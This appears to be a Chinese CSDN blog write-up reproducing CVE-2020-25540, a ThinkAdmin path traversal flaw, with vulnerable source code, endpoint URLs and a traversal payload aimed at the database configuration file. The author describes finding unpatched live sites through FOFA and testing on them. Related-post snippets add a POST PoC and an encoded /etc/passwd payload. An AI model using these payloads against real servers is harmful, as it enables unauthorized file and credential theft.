CVE-2020-25540:ThinkAdmin未授权列目录/任意文件读取漏洞复现

最新推荐文章于 2024-07-19 14:18:42 发布
置顶 最新推荐文章于 2024-07-19 14:18:42 发布
阅读量3.1k 收藏 3
点赞数 1
分类专栏: 漏洞学习 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jietewang/article/details/110949574
版权

目录

 

1. 简介

2. 影响范围

3. 环境搭建

3.1 安装Composer

4. 漏洞复现

4.1 列举目录

4.2 任意文件读取

1. 简介

ThinkAdmin 是基于 ThinkPHP后台开发框架,在ThinkAdmin v6版本存在路径遍历漏洞,该漏洞可以利用GET请求编码参数读取远程服务器上任意文件。

2. 影响范围

Thinkadmin ≤ 2020.08.03.01  

v5(任意文件读取)    

v6(列目录,任意文件读取)

3. 环境搭建

ThinkAdmin 源码仓库:https://github.com/zoujingli/ThinkAdmin

详细安装过程请查看官方手册,环境搭建过程均来自手册。

靶机   winserver 2008

       ThinkAdmin版本小于 ≤ 2020.08.03.01

PHP >= 7.0.1

据手册说明6.0版本后,必须通过Composer方式安装和更新,所以无法通过Git安装。

3.1 安装Composer

如果还没有安装Composer,在 Linux 和 Mac OS X 中运行如下命令即可。

curl  -sS  https://getcomposer.org/installer  |  php

mv  composer.phar  /usr/local/bin/composer

如果是Windows环境,请先下载 Composer-Setup.exe 。至于想了解Composer是什么请自行百度,查阅相关手册。

然后双击安装包,一直默认就行了,根据官网的建议使用国内的镜像。

打开命令行窗口(windows用户)或者 Linux 控制台执行如下命令

composer  config  -g  repo.packagist  composer  https://mirrors.aliyun.com/composer/

如果是第一次安装,在命令行内,切换到指定的网站根目录下面执行命令:

composer  create-project  topthink/think thinkadmin

thinkadmin 是目录可以任意更改

如果是已经安装过了,执行以下命令更新

composer update topthink/framework

测试运行命令

进入命令行,执行命令 php think run

php think run -p 80 # 可以指定端口

在浏览器中输入地址访问测试。

到这儿整个靶机环境就算搭建完成

总结:使用Composer安装会有一个问题,关于Composer的详细情况请百度官方文档查看相关内容,但是要清除这个工具是一个PHP依赖管理工具,根据官方的安装文档执行命令后只需要执行一遍,如果需要重新执行安装需要彻底删除相关依赖库。个人建议直接下载源码安装,因为就算你安装了也需要自行导入数据库,本人开始以为是全自动的,浏览器有些不好用,使用抓包工具才发现是没有导入数据库和配置数据库配置文件。

4. 漏洞复现

互联网上应该找不到存在漏洞的版本了,所有的链接都是指向官方的代码仓库,下载的源码安装,本人未能成功利用本地环境复现成功。但是这怎么能难道足智多谋的本人呢?最终还没找到了一些还未及时修复的站。

使用 fofa 网络空间搜索引擎,搜索语法如下:

app="ThinkAdmin"

能获得很多结果,但是并不是所有的都存在相关漏洞的,具体的操作请自行发掘。

4.1 列举目录

查看版本url

https://xx.xx.xx.xx/admin/login.html?s=admin/api.Update/version

文件 app/admin/controller/api/Update.php存在3个function,都是不用登录认证就可以使用的,引用列表如下:

namespace app\admin\controller\api;

use think\admin\Controller;
use think\admin\service\InstallService;
use think\admin\service\ModuleService;

version()可以获取到当前版本:2020.08.03.01,小于这个版本都有可能存在该漏洞。

在下面的代码里发现直接使用POST方法把rules和ignore参数传给 InstallService::instance()->getList() ,根据上面的use引用知道文件路径:

vendor/zoujingli/think-library/src/service/InstallService.php

/**
* 读取文件列表
*/
public function node()
{
    $this->success('获取文件列表成功!', InstallService::instance()->getList(
        json_decode($this->request->post('rules', '[]', ''), true),
        json_decode($this->request->post('ignore', '[]', ''), true)
    ));
}

 跟踪getList,会利用_scanList()去遍历$rules数组。

/**
 * 获取文件信息列表
 * @param array $rules 文件规则
 * @param array $ignore 忽略规则
 * @param array $data 扫描结果列表
 * @return array
 */
public function getList(array $rules, array $ignore = [], array $data = []): array
{
    // 扫描规则文件
    foreach ($rules as $key => $rule) {
        $name = strtr(trim($rule, '\\/'), '\\', '/');
        $data = array_merge($data, $this->_scanList($this->root . $name));
    }
    // 清除忽略文件
    foreach ($data as $key => $item) foreach ($ignore as $ign) {
        if (stripos($item['name'], $ign) === 0) unset($data[$key]);
    }
    // 返回文件数据
    return ['rules' => $rules, 'ignore' => $ignore, 'list' => $data];
}

调用 scanDirectory()去递归遍历目录下的文件,最后在透过 _getInfo()去获取文件名与哈希,由下面的代码可知程序没有进行任何验证,攻击者可以在未授权的情况下读取服务器文件列表。

/**
 * 获取目录文件列表
 * @param string $path 待扫描目录
 * @param array $data 扫描结果
 * @return array
 */
private function _scanList($path, $data = []): array
{
    foreach (NodeService::instance()->scanDirectory($path, [], null) as $file) {
        $data[] = $this->_getInfo(strtr($file, '\\', '/'));
    }
    return $data;
}
/**
 * 获取所有PHP文件列表
 * @param string $path 扫描目录
 * @param array $data 额外数据
 * @param string $ext 文件后缀
 * @return array
 */
public function scanDirectory($path, $data = [], $ext = 'php')
{
    if (file_exists($path)) if (is_file($path)) $data[] = $path;
    elseif (is_dir($path)) foreach (scandir($path) as $item) if ($item[0] !== '.') {
        $realpath = rtrim($path, '\\/') . DIRECTORY_SEPARATOR . $item;
        if (is_readable($realpath)) if (is_dir($realpath)) {
            $data = $this->scanDirectory($realpath, $data, $ext);
        } elseif (is_file($realpath) && (is_null($ext) || pathinfo($realpath, 4) === $ext)) {
            $data[] = strtr($realpath, '\\', '/');
        }
    }
    return $data;
}
/**
 * 获取指定文件信息
 * @param string $path 文件路径
 * @return array
 */
private function _getInfo($path): array
{
    return [
        'name' => str_replace($this->root, '', $path),
        'hash' => md5(preg_replace('/\s+/', '', file_get_contents($path))),
    ];
}

利用以下payload读取网站根目录

http://xxxxx/ThinkAdmin/public/admin.html?s=admin/api.Update/node

利用POST方法控制$rules参数

4.2 任意文件读取

/**
 * 读取文件内容
 */
public function get()
{
    $filename = decode(input('encode', '0'));
    if (!ModuleService::instance()->checkAllowDownload($filename)) {
        $this->error('下载的文件不在认证规则中!');
    }
    if (file_exists($realname = $this->app->getRootPath() . $filename)) {
        $this->success('读取文件内容成功!', [
            'content' => base64_encode(file_get_contents($realname)),
        ]);
    } else {
        $this->error('读取文件内容失败!');
    }
}

 首先从get读取 encode 参数并使用decode()解码:

/**
 * 解密 UTF8 字符串
 * @param string $content
 * @return string
 */
function decode($content)
{
    $chars = '';
    foreach (str_split($content, 2) as $char) {
        $chars .= chr(intval(base_convert($char, 36, 10)));
    }
    return iconv('GBK//TRANSLIT', 'UTF-8', $chars);
}

解密utf8字符串,刚好上面有个加密utf8字符串的encode(),攻击时直接调用就可以了。

/**
 * 加密 UTF8 字符串
 * @param string $content
 * @return string
 */
function encode($content)
{
    [$chars, $length] = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT', $content))];
    for ($i = 0; $i < $length; $i++) $chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0);
    return $chars;
}

跟进ModuleService::instance()->checkAllowDownload(),文件路径 vendor/zoujingli/think-library/src/service/ModuleService.php :

/**
 * 检查文件是否可下载
 * @param string $name 文件名称
 * @return boolean
 */
public function checkAllowDownload($name): bool
{
    // 禁止下载数据库配置文件
    if (stripos($name, 'database.php') !== false) {
        return false;
    }
    // 检查允许下载的文件规则
    foreach ($this->getAllowDownloadRule() as $rule) {
        if (stripos($name, $rule) !== false) return true;
    }
    // 不在允许下载的文件规则
    return false;
}

代码是禁止下载数据库配置文件database.php,查看允许下载的文件规则 getAllowDownloadRule():

/**
 * 获取允许下载的规则
 * @return array
 */
public function getAllowDownloadRule(): array
{
    $data = $this->app->cache->get('moduleAllowRule', []);
    if (is_array($data) && count($data) > 0) return $data;
    $data = ['config', 'public/static', 'public/router.php', 'public/index.php'];
    foreach (array_keys($this->getModules()) as $name) $data[] = "app/{$name}";
    $this->app->cache->set('moduleAllowRule', $data, 30);
    return $data;
}

/**
*允许列表
*config
*public/static
*public/router.php
*public/index.php
*app/admin
*app/wechat
*/

参数$name被限制了必须要是允许文件列表和不能说是database.php文件才能够被读取,可以通过 'public/static/../../1.txt' 读取根目录的1.txt。在Linux环境下对于database.php的限制是没法绕过的,但是在windows下可以把 . 替换成 " ,传入

public/static/../../config/database"php

使用编码脚本进行编码的结果为:

 

尝试读取数据库配置文件(找了半天也没有找到windows的,也没法读取),于是尝试读取其他文件:

 

本文参考:

https://github.com/zoujingli/ThinkAdmin/issues/244

 

 

Jietewang
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ThinkAdmin漏洞CVE-2020-25540复现
玄道的网安博客
10-18 5286
简介 ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统 漏洞概述 ThinkAdmin6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,没有任何过滤。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的任意文件。 影响版本 ThinkAdmin版本小于 ≤ 2020.08.03.01 环境搭建 使用phpstudy进行安装 设置阿里云 Composer 代理 composer config -g repo.packagist c...
ThinkAdmin任意文件读取(CVE-2020-25540)
m0_65150886的博客
01-23 559
ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。该漏洞主要是因为api中存在危险函数,且作任何限制。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的文件。1.访问http://ip:port,出现如下页面,开始实验。获取/etc/passwd的base64编码。2.构造payload。4.base64解码。
thinkadmin 目录遍历 (CVE-2020-25540
最新发布
qq_23003811的博客
07-19 213
ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin v6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。3、1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s对应./../../etc/passwd的生成方法。在本地php环境,把脚本得到到poc.php中,访问poc.php生成。v5(任意文件读取)v6(目录,任意文件读取)对结果进行base64解码。2、文件读取+目录穿越。
ThinkAdmin目录/任意文件读取CVE-2020-25540漏洞复现及环境搭建
yzl_007的博客
08-03 2612
ThinkAdmin目录/任意文件读取CVE-2020-25540漏洞复现 漏洞介绍 ThinkAdmin 是基于 ThinkPHP后台开发框架,在ThinkAdmin v6版本存在路径遍历漏洞,该漏洞可以利用GET请求编码参数读取远程服务器上任意文件。 影响范围 Thinkadmin2020.08.03.01 v5(任意文件读取) v6(目录,任意文件读取) ThinkAdmin6环境搭建 这里我使用的是kali linux靶机来搭建环境 1、安装php环境 查看版本发现没有,按照要求
ThinkAdminV6 CVE-2020-25540 目录遍历文件读取漏洞
3hex的博客
11-23 4832
POC:https://github.com/Schira4396/CVE-2020-25540/blob/main/poc.pyhttps://github.com/Schira4396/CVE-2020-25540/blob/main/poc.py 影响版本: ThinkAdmin版本 ≤ 2020.08.03.01 漏洞详解: https://github.com/zoujingli/ThinkAdmin/issues/244https://github.com/zoujingli/Think
ThinkAdminV6 授权访问and 任意文件查看 漏洞复现
Adminxe的博客
09-23 979
0x00 简介 ThinkAdmin是基于 ThinkPHP 的微信后台管理平台 0x01 影响版本 ThinkAdminV6 0x02 漏洞复现 POC: POST /admin.html?s=admin/api.Update/node HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: te..
ThinkAdmin任意文件读取漏洞CVE-2020-25540
MD@@nr丫卡uer
02-04 775
简述 ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统 漏洞描述 ThinkAdmin6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,没有任何过滤。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的任意文件漏洞复现 fofa搜索语句 app="ThinkAdmin" POC POST /admin/login.html/?s=admin/api.Update/node HTTP/1.1 Host: 127.0.0.1 Content-Length: 21 Cach
CVE-2020-1206-POC:CVE-2020-1206初始化的内核内存读取POC
03-20
CVE-2020-1206初始化的内核内存读取POC (c)2020 ZecOps,Inc.- ://www.zecops.com-查找攻击者的错误POC检查CVE-2020-1206 /“ SMBleed”预期结果:包含目标计算机内核内存的本地文件。仅用于公司环境中的教育和...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
ThinkAdmin后台管理系统
08-07
Think Admin 1.0 基于ThinkPHP5开发,初始的1.0版本没有开发成CMS,只是个后台管理系统,附带常用的功能,方便扩展使用。
[Timeline Sec] - CVE-2020-9484:Tomcat Session 反序复现1
08-03
【Apache Tomcat与Session反序漏洞CVE-2020-9484详解】 Apache Tomcat是一款广泛使用的开源Web应用服务器,它基于Java,主要用于运行Servlet和JSP(JavaServer Pages)应用程序。在2020年,Tomcat被发现存在一...
ThinkAdminCVE-2020-25540漏洞复现
m0_48520508的博客
11-09 1907
0x00简介 ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 非常适用快速二次开发,默认集成 微信开发组件,支持微信服务号,微信支付,支付宝支付,阿里云OSS存储,七牛云存储,本地服务器存储。,ThinkAdmin的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。 0x01漏洞概述 ThinkAdmin V6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,且作任何限制。
春秋云镜 CVE-2020-25540
qq_22002773的博客
08-07 633
春秋云镜 CVE-2020-25540
CVE-2020-25540)Thinkadmin v6任意文件读取漏洞复现
thelostworld
09-24 935
Thinkadmin v6任意文件读取漏洞CVE-2020-25540复现 ​ 快结束,抓住HVV的小尾巴,现在有空去复现最近出的漏洞 一、漏洞简介: ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。ThinkAdmin 6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。 二、..
Thinkadmin v6任意文件读取漏洞CVE-2020-25540复现
weixin_39811856的博客
10-29 921
一、漏洞简介: ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。ThinkAdmin 6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。 二、影响范围: Thinkadmin版本小于 ≤ 2020.08.03.01 三、漏洞复现: 利用POC去打(burp直接放包不能成功回去.
云镜CVE-2020-25540复现
m0_46684679的博客
02-26 702
Thinkadmin v6任意文件读取漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值